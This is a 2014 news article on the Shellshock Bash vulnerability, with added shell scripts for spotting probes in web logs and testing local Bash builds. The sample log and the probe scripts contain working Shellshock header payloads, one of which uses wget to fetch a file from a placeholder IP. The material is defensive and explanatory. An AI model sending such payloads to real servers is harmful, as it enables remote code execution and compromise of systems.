The bug is very serious; fixes should be applied immediately

Sep 28, 2014 18:19 GMT

The bug discovered in GNU Bash, the default command shell in many Linux and Unix-based operating systems, has been making the headlines all week, and for good reason.

Security researchers have dubbed it Shellshock, a deliberate pun, and the flaw has been assigned the maximum severity score of 10 under the Common Vulnerability Scoring System (CVSS), the standard method for quantifying the severity of software vulnerabilities that is used by a large number of organizations.

Nastier than Heartbleed on all levels

To get an idea of how bad Shellshock is, consider that Heartbleed, despite the massive attention it received and the racket it created, scored only 5.0 and was rated a medium-risk threat, with an impact subscore of 2.9; its exploitability subscore, on the other hand, was the maximum 10.

The exploitability and impact subscores for Shellshock (CVE-2014-6271) were both 10, which means that the flaw is not only trivial to exploit but also gives an attacker complete control over the confidentiality, integrity and availability of the affected system, with no authentication required.

The flaw lies in how Bash imports function definitions from environment variables. When the value of a variable begins with "() {", Bash parses it as a function, but it does not stop at the closing brace: any commands appended after the function body are executed as well. Any program that places attacker-controlled data in an environment variable and then starts Bash is therefore exposed. Since the bug affects versions 1.14 through 4.3 of the shell, Shellshock has been present in the command-line tool for more than 20 years.

Lots of systems are affected

Over time, Linux has been adopted for a wide range of devices, and GNU Bash ships on plenty of them, rendering them vulnerable to attacks exploiting Shellshock.

Among the biggest concerns are Unix-based web servers that run CGI scripts to generate dynamic content: the web server copies request headers such as User-Agent into environment variables before starting the script, so a crafted header reaches Bash unauthenticated from anywhere on the Internet. Attacks in the wild have already been recorded, and their number has only increased since the vulnerability was publicly disclosed on Wednesday (September 24).

Initially, Sucuri saw scans that searched for vulnerable servers, an activity that is not at all uncommon after a flaw is uncovered, as security researchers and administrators check their own machines.

Later on, the security firm's monitoring systems picked up thousands of malicious attempts, some of which tried to install remote command shells on the compromised hosts.

“As we started to scan our clients’ sites (and the Internet as a whole) we found that about 2.9% of all sites we scanned were vulnerable to this problem [Shellshock],” Daniel Cid from Sucuri said. “When we talk about millions of websites online, 2.9% is a lot,” he added.
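The probes and attacks Sucuri describes leave a recognizable trace in web server logs, because the payload has to carry the "() {" prefix in a client-supplied header. The following script is an added example, not Sucuri's or the article's code: it runs a detection over a handful of constructed Apache-style access-log lines (the IP addresses and download host are hypothetical), counts the suspicious requests and lists the source addresses, which is what an administrator would feed to a block rule or an incident ticket. The pattern also catches the space-free "(){" variant that some scanners used.

```shell
#!/bin/sh
# Added example (not from Sucuri or the article): flag Shellshock probes in
# a web server access log. Attackers place the function-definition prefix
# in any header the CGI gateway exports (User-Agent, Referer, Cookie, ...),
# so the check matches the prefix anywhere on the line.

# Constructed sample log (Apache combined format; hypothetical addresses).
LOG=$(mktemp) || exit 1
cat > "$LOG" <<'EOF'
203.0.113.10 - - [25/Sep/2014:10:02:11 +0000] "GET /cgi-bin/status HTTP/1.1" 200 512 "-" "() { :;}; echo; /bin/bash -c 'wget -O /tmp/x http://198.51.100.7/x'"
198.51.100.20 - - [25/Sep/2014:10:02:15 +0000] "GET /index.html HTTP/1.1" 200 2048 "-" "Mozilla/5.0 (X11; Linux x86_64)"
203.0.113.11 - - [25/Sep/2014:10:03:40 +0000] "GET /cgi-bin/test.cgi HTTP/1.1" 404 301 "() { :;}; /bin/ping -c 1 198.51.100.7" "curl/7.37.0"
192.0.2.5 - - [25/Sep/2014:10:04:02 +0000] "GET /cgi-bin/status HTTP/1.1" 200 512 "-" "(){ :;};/usr/bin/id"
EOF

# shellshock_hits LOGFILE: print every line carrying a "() {" prefix
# (optional spaces allowed); empty output, not an error, when none match.
shellshock_hits() {
    grep -E '\(\) *[{]' "$1" || true
}

# shellshock_count LOGFILE: number of suspicious requests.
shellshock_count() {
    shellshock_hits "$1" | wc -l | tr -d ' '
}

# shellshock_sources LOGFILE: distinct client addresses that sent probes.
shellshock_sources() {
    shellshock_hits "$1" | awk '{print $1}' | sort -u
}

echo "suspicious requests: $(shellshock_count "$LOG")"
shellshock_sources "$LOG"
```

Run against a real log, the same functions work unchanged; only the sample file at the top is constructed for the demonstration. Matching on the prefix rather than on specific commands keeps the check independent of whatever payload the attacker appends.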

Gaining control over a web server enables attackers to compromise the websites hosted there and then target visitors with threats tailored to their operating systems, from PCs running Windows to mobile phones powered by Android.

However, web servers are not the only great concern, as Bash is also found in the Linux OSes installed on industrial control systems (ICS) used in critical infrastructure. These are also at risk of falling victim to a malicious actor, especially since they are generally kept in service well beyond the support lifetime of the operating system powering them.

Patching them so that the Bash vulnerability is closed is more difficult than one would think, because in some cases the ICS run on Linux builds that were never designed to be upgraded, or whose life cycle has ended and which are no longer maintained by the vendor.

Furthermore, since they are part of critical infrastructure, any downtime costs money; as such, applying the fix for Bash, where one is available at all, has to wait for a scheduled maintenance window. Until then, the systems remain open to exploitation.

Shellshock affects embedded devices as well, some of the most common being routers and access points. Basically, any device with a vulnerable version of Bash can be taken over through an application that hands untrusted input to the shell via environment variables, as CGI web servers do with request headers.

Updating is highly recommended

Although patches have been delivered for some Linux distros, it is a well-known fact that affected systems are not patched the moment a fix exists. In the case of Heartbleed, plenty of servers were still at risk months after the fix had been issued; many systems still are.

Apple’s OS X is also affected by the Bash bug, but the company said that only a small part of users are at risk because “systems are safe by default and not exposed to remote exploits of bash unless users configure advanced UNIX services.” In other words, only advanced users should be more worried. Apple is readying a fix, though.

Taking this into consideration, it is not far-fetched to expect malware authors to build automatic Shellshock checks into their tools so that every system they reach is tested for the vulnerability.

The bottom line is that users, and especially system administrators, should apply the fixes for Shellshock as soon as they become available for the vulnerable devices, be they personal computers, servers or embedded devices.

Systems can be checked for the original Bash bug (CVE-2014-6271) by running the following in a terminal:

```sh
env x='() { :;}; echo vulnerable' bash -c "echo Shellshock"
```

A patched system would return:

```
bash: warning: x: ignoring function definition attempt
bash: error importing function definition for `x'
Shellshock
```

Meanwhile, a system susceptible to compromise would reply with:

```
vulnerable
Shellshock
```

Two caveats apply. The warning lines come from the first generation of patched builds; builds that import functions only from specially named variables (the BASH_FUNC_x%% encoding used by current releases) treat x as an ordinary variable and print nothing but Shellshock, which is also a pass. And the test covers only CVE-2014-6271; the first patch was incomplete, and the follow-up issue tracked as CVE-2014-7169 needs a separate check.
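The one-liner above tests the shell you are sitting at; the script below, an added example rather than code from the article, does the same job the way the CGI attack path described earlier delivers the payload, by placing it in an HTTP_USER_AGENT variable and starting the shell under test with it. It probes a given binary for both CVE-2014-6271 and the incomplete-fix follow-up CVE-2014-7169 (on a build still affected by the latter, "echo date" is misparsed and creates a file named "echo", which the probe looks for in a scratch directory). The function names, the SHOCKED marker and the BASH_BINS variable are this example's own choices; the probe strings are the widely circulated ones.

```shell
#!/bin/sh
# Added example (not from the article): probe a shell binary for
# CVE-2014-6271 and CVE-2014-7169 the way a CGI gateway would reach it,
# through an environment variable derived from a request header.
# Works for any sh-compatible binary; a non-Bash shell simply reports
# "patched" because it never imports functions from the environment.

# probe_6271 SHELL: "vulnerable" if the command after the function body runs.
probe_6271() {
    out=$(env "HTTP_USER_AGENT=() { :; }; echo SHOCKED" "$1" -c 'echo done' 2>/dev/null) || out=""
    case "$out" in
        *SHOCKED*) echo vulnerable ;;
        *)         echo patched ;;
    esac
}

# probe_7169 SHELL: the original fix left the parser confused by a trailing
# backslash; on an affected build "echo date" becomes a redirection and a
# file named "echo" appears in the working directory.
probe_7169() {
    dir=$(mktemp -d) || return 1
    ( cd "$dir" && env 'X=() { (a)=>\' "$1" -c 'echo date' >/dev/null 2>&1 ) || true
    if [ -e "$dir/echo" ]; then result=vulnerable; else result=patched; fi
    rm -rf "$dir"
    echo "$result"
}

# probe_bash [SHELL]: combined verdict; defaults to the bash on PATH.
probe_bash() {
    bash_bin=$1
    [ -n "$bash_bin" ] || bash_bin=$(command -v bash 2>/dev/null || true)
    if [ -z "$bash_bin" ] || [ ! -x "$bash_bin" ]; then
        echo no-bash
        return 0
    fi
    r1=$(probe_6271 "$bash_bin")
    r2=$(probe_7169 "$bash_bin")
    if [ "$r1" = vulnerable ] || [ "$r2" = vulnerable ]; then
        echo vulnerable
    else
        echo patched
    fi
}

# Usage: BASH_BINS="/bin/bash /opt/vendor/bin/bash" sh probe.sh
# Embedded images often carry more than one copy of the shell, so list
# every binary, not just the one on PATH.
for b in ${BASH_BINS:-$(command -v bash 2>/dev/null || true)}; do
    printf '%s: CVE-2014-6271=%s CVE-2014-7169=%s\n' \
        "$b" "$(probe_6271 "$b")" "$(probe_7169 "$b")"
done
```

Because the probe only needs a path to a binary, it can be pointed at a mounted firmware image or a chroot as easily as at the host's own /bin/bash, which is how the embedded devices mentioned above are best checked before a vendor update arrives.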
Symantec has also published a video demonstrating Shellshock and explaining how an attack through the CGI interface could be conducted.